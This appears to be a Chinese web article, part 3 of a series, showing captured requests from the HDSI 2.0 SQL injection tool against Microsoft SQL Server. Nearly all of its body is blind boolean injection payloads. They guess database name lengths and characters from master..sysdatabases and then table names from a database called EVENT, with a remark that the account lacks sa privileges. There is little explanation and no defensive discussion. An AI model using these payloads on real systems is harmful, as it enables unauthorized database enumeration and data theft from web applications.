hdsi2.0 sql注入部分抓包(3)
减小字体
增大字体猜解数据库:
GET
and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <8
and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <4
and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <6
and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <7
...
...
...
and (Select top 1 ascii(substring(name,2,1)) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by
dbid
desc) <104
and (Select top 1 ascii(substring(name,3,1)) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by
dbid
desc) <104
...
...
...
and (Select top 1 len(name) from (Select top 4 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <5
master 不是sa权限,不能跨库
猜解表名:
EventCategory
GET
and (Select top 1 unicode(substring(name,2,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85))
T
order by id desc) < 80
and (Select top 1 unicode(substring(name,11,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char
(85)) T
order by id desc) < 80
and (Select top 1 unicode(substring(name,12,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char
(85)) T
order by id desc) < 80
and (Select top 1 unicode(substring(name,6,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85))
T
order by id desc) < 80
Tags:
作者:郁郁小蝎
- 好的评价 如果您觉得此文章好,就请您
0%(0) 
- 差的评价 如果您觉得此文章差,就请您
0%(0) 
中查找“hdsi2.0 sql注入部分抓包(3)”更多相关内容
中查找“hdsi2.0 sql注入部分抓包(3)”更多相关内容评论内容只代表网友观点,与本站立场无关!
评论摘要(共 0 条,得分 0 分,平均 0 分)
查看完整评论